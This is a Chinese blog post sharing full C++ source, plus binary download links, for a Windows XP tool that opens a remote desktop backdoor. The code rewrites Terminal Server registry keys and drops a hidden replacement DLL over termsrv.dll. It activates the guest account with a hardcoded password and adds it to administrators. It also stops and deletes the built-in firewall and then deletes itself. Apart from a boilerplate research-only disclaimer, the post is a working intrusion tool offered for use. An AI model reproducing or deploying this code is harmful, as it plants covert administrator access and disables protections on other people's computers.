xp下双开3389源码 's

admin

139803
文章

114
评论

2017年5月8日00:03:35评论398 views字数 7942阅读26分28秒阅读模式

摘要

作者：cooldiyer
来源：红狼很早时候写的,方便大家用,代码丢了我也可以百度到
编译后,直接运行,XP的终端自动开启激活guest,密码为cooldiyer,加管理员组
并且可以多用户登录
声明,原创………………..

作者：cooldiyer
来源：红狼

很早时候写的,方便大家用,代码丢了我也可以百度到
编译后,直接运行,XP的终端自动开启激活guest,密码为cooldiyer,加管理员组
并且可以多用户登录
声明,原创………………..

// xp3389.cpp : XP下双开3389的工具 Code By CoolDiyer // #pragma comment(linker, "/FILEALIGN:0x200 /opt:nowin98 /IGNORE:4078 /MERGE:.rdata=.text /MERGE:.data=.text /section:.text,ERW") #include "stdafx.h" #include "resource.h" #include  #include  DWORD GetProcessId(LPCTSTR szProcName) { PROCESSENTRY32 pe; DWORD dwPid; DWORD dwRet; BOOL bFound = FALSE;  HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hSP) {   pe.dwSize = sizeof( pe );      for (dwRet = Process32First(hSP, &pe);   dwRet;   dwRet = Process32Next(hSP, &pe))   {    if (lstrcmpi( szProcName, pe.szExeFile) == 0)    {     dwPid = pe.th32ProcessID;     bFound = TRUE;     break;    }   }   CloseHandle(hSP);      if (bFound == TRUE)   {    return dwPid;   } } return NULL; }  bool CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam) { if (!IsWindowVisible(hwnd))   return true;  DWORD dwWindowThreadId = NULL; DWORD  dwLsassId = (DWORD)lParam; GetWindowThreadProcessId(hwnd, &dwWindowThreadId); if (dwWindowThreadId == (DWORD)lParam) {   // 关闭指定进程的窗口   SendMessage(hwnd, WM_CLOSE, 0, 0); } return true; } // 写注册表的指定键的数据(Mode:0-新建键数据 1-设置键数据 2-删除指定键 3-删除指定键项) from NameLess114 int WriteRegEx(HKEY MainKey, LPCTSTR SubKey, LPCTSTR Vname, DWORD Type, char* szData, DWORD dwData, int Mode) { HKEY  hKey; DWORD dwDisposition;    int   iResult =0;  __try {   // SetKeySecurityEx(MainKey,Subkey,KEY_ALL_ACCESS);   switch(Mode)     {      case 0:    if(RegCreateKeyEx(MainKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&dwDisposition) != ERROR_SUCCESS)     __leave;      case 1:    if(RegOpenKeyEx(MainKey,SubKey,0,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)           __leave;             switch(Type)    {       case REG_SZ:       case REG_EXPAND_SZ:             if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)szData,strlen(szData)+1) == ERROR_SUCCESS)            iResult =1;             break;    case REG_DWORD:                 if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)&dwData,sizeof(DWORD)) == ERROR_SUCCESS)        iResult =1;              break;    case REG_BINARY:     break;    }    break;       case 2:     if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)         __leave;                    if (RegDeleteKey(hKey,Vname) == ERROR_SUCCESS)               iResult =1;     break;      case 3:     if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)         __leave;                    if (RegDeleteValue(hKey,Vname) == ERROR_SUCCESS)               iResult =1;     break;   } } __finally {   RegCloseKey(MainKey);     RegCloseKey(hKey); } return iResult; } bool DebugPrivilege(const char *PName, BOOL bEnable) { BOOL              bResult = TRUE; HANDLE            hToken; TOKEN_PRIVILEGES  TokenPrivileges;  if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {   bResult = FALSE;   return bResult; } TokenPrivileges.PrivilegeCount = 1; TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;  LookupPrivilegeValue(NULL, PName, &TokenPrivileges.Privileges[0].Luid); AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);     if (GetLastError() != ERROR_SUCCESS) {   bResult = FALSE; }  CloseHandle(hToken); return bResult; } bool UnloadRemoteModule(DWORD dwProcessID, HANDLE hModuleHandle) { HANDLE hRemoteThread; HANDLE hProcess;  if (hModuleHandle == NULL)   return false; hProcess=::OpenProcess(PROCESS_VM_WRITE|PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION, FALSE, dwProcessID); if (hProcess == NULL)   return false;  HMODULE hModule=::GetModuleHandle("kernel32.dll"); LPTHREAD_START_ROUTINE pfnStartRoutine = (LPTHREAD_START_ROUTINE)::GetProcAddress(hModule, "FreeLibrary"); hRemoteThread=::CreateRemoteThread(hProcess, NULL, 0, pfnStartRoutine, hModuleHandle, 0, NULL);  if(hRemoteThread==NULL) {   ::CloseHandle(hProcess);   return false; } ::WaitForSingleObject(hRemoteThread,INFINITE); ::CloseHandle(hProcess); ::CloseHandle(hRemoteThread); return true; } HANDLE FindModule(DWORD dwProcessID, LPCTSTR lpModulePath) { HANDLE hModuleHandle = NULL; MODULEENTRY32 me32={0}; HANDLE hModuleSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID); me32.dwSize=sizeof(MODULEENTRY32); if(::Module32First(hModuleSnap, &me32)) {   do   {    if (!lstrcmpi(me32.szExePath, lpModulePath))    {     hModuleHandle = me32.hModule;     break;    }   }while(::Module32Next(hModuleSnap,&me32)); } ::CloseHandle(hModuleSnap); return hModuleHandle; } bool UnloadModule(LPCTSTR lpModulePath) { BOOL bRet = false; PROCESSENTRY32 pe32; pe32.dwSize = sizeof(pe32);  HANDLE hProcessSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);  //查找相关的进程 if(::Process32First(hProcessSnap, &pe32)) {   do   {    HANDLE hModuleHandle = FindModule(pe32.th32ProcessID, lpModulePath);    if (hModuleHandle != NULL)    {     bRet = UnloadRemoteModule(pe32.th32ProcessID, hModuleHandle);    }   }while (Process32Next(hProcessSnap,&pe32)); } CloseHandle(hProcessSnap); return bRet; } void StartService(LPCTSTR lpService) { SC_HANDLE hSCManager = OpenSCManager( NULL, NULL,SC_MANAGER_CREATE_SERVICE ); if ( NULL != hSCManager ) {   SC_HANDLE hService = OpenService(hSCManager, lpService, DELETE | SERVICE_START);   if ( NULL != hService )   {    StartService(hService, 0, NULL);    CloseServiceHandle( hService );   }   CloseServiceHandle( hSCManager ); } } BOOL ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName) { HGLOBAL hRes; HRSRC hResInfo; HANDLE hFile; DWORD dwBytes;  hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType); if (hResInfo == NULL)   return FALSE; hRes = LoadResource(NULL, hResInfo); if (hRes == NULL)   return FALSE; hFile = CreateFile   (   lpFileName,   GENERIC_WRITE,   FILE_SHARE_WRITE,   NULL,   CREATE_ALWAYS,   FILE_ATTRIBUTE_NORMAL,   NULL   ); if (hFile == NULL)   return FALSE; WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL); CloseHandle(hFile);  return TRUE; } void SetReg() { WriteRegEx(HKEY_LOCAL_MACHINE, "SYSTEM//CurrentControlSet//Services//TermService","Start",REG_DWORD,NULL,2,0); WriteRegEx(HKEY_LOCAL_MACHINE, "SOFTWARE//Microsoft//Windows NT//CurrentVersion//Winlogon", "KeepRASConnections", REG_SZ, "1", 0, 0); WriteRegEx(HKEY_LOCAL_MACHINE, "SYSTEM//CurrentControlSet//Control//Terminal Server", "fDenyTSConnections", REG_DWORD, NULL, 0, 0); WriteRegEx(HKEY_LOCAL_MACHINE, "SYSTEM//CurrentControlSet//Control//Terminal Server//Licensing Core", "EnableConcurrentSessions",   REG_DWORD, NULL, 1, 0); WriteRegEx(HKEY_LOCAL_MACHINE, "SYSTEM//CurrentControlSet//Services//TermService//Parameters", "ServiceDll", REG_EXPAND_SZ,   "%SystemRoot%//system32//termsrvhack.dll", 0, 0); } void ReleaseDll() { char strSystemPath[MAX_PATH]; char strDllcachePath[MAX_PATH]; GetSystemDirectory(strSystemPath, sizeof(strSystemPath)); GetSystemDirectory(strDllcachePath, sizeof(strDllcachePath)); lstrcat(strSystemPath, "//termsrvhack.dll"); lstrcat(strDllcachePath, "//dllcache//termsrvhack.dll"); ReleaseResource(IDR_DLL, "BIN", strSystemPath); ReleaseResource(IDR_DLL, "BIN", strDllcachePath); SetFileAttributes(strSystemPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM); SetFileAttributes(strDllcachePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM); } bool IsOSXP() { OSVERSIONINFOEX OsVerInfoEx; OsVerInfoEx.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX); GetVersionEx((OSVERSIONINFO *)&OsVerInfoEx); // 注意转换类型 return OsVerInfoEx.dwMajorVersion == 5 && OsVerInfoEx.dwMinorVersion == 1; } void HijackService() { char strDll[MAX_PATH]; GetSystemDirectory(strDll, sizeof(strDll)); lstrcat(strDll, "//termsrv.dll"); // 释放termsrvhack.dll ReleaseDll();  // 遍历进程卸载现在加载的DLL DebugPrivilege(SE_DEBUG_NAME, TRUE); if (!UnloadModule(strDll))   return; DebugPrivilege(SE_DEBUG_NAME, FALSE);  // 关闭要弹出的出错对话框和因DLL强制卸载使一些服务异常终止而弹出来的自动关机对话框 // 对进程赋予关闭权限 DebugPrivilege(SE_SHUTDOWN_NAME,TRUE); DWORD dwLsassId = GetProcessId("csrss.exe"); while (!AbortSystemShutdown(NULL)) {   // 一些系统是会弹出drwtsn32.exe   DWORD dwDrwtsn32Id = GetProcessId("drwtsn32.exe");   if (dwDrwtsn32Id != NULL)   {    EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)dwDrwtsn32Id);   }   // 模块强制卸载时会出错，关闭csrss.exe进程弹出的出错窗口   EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)dwLsassId);   Sleep(10); } DebugPrivilege(SE_SHUTDOWN_NAME, FALSE); } int WINAPI WinMain(        HINSTANCE hInstance,      // handle to current instance        HINSTANCE hPrevInstance,  // handle to previous instance        LPSTR lpCmdLine,          // command line        int nCmdShow              // show state        ) { // 一些注册表的操作 SetReg(); if (IsOSXP()) {   // 替换DLL   HijackService(); } // 开始终端服务 StartService("TermService"); // 激活guest,加管理员组，自删除，停止XP自带的防火墙，并删除它 char strCommand[1024]; char strSelf[MAX_PATH]; GetModuleFileName(NULL, strSelf, sizeof(strSelf)); wsprintf(strCommand, "cmd.exe /c net user guest /active:yes && net user guest cooldiyer && net localgroup administrators guest /add && net stop SharedAccess /y && del /"%s/" && sc delete SharedAccess", strSelf); WinExec(strCommand, SW_HIDE); return 0; }

下载地址：
xp3389_bin.rar (107.16 KB)
xp3389_src.rar (202.54 KB)

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

xp下双开3389源码 's

Discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit

LBS 2.0.313 重要安全更新 [2007-07-03] 's

LBS blog又一注射漏洞含漏洞解析和exp 's

Penetration Testing 渗透测试 (11%) 's

bbsxp 2007[以前版本不知道]一个有意思的漏洞 's

bbsxp 2007斑竹权限注射 's

bbsxp 2007 注射漏洞 's

BBSXP7 mssql版，从注入到拿WEBSHELL 's

LBS 2.0.312 重要安全更新 [2007-06-29] 's

LBS blog sql注射漏洞[All version] 's

发表评论

在线咨询

微信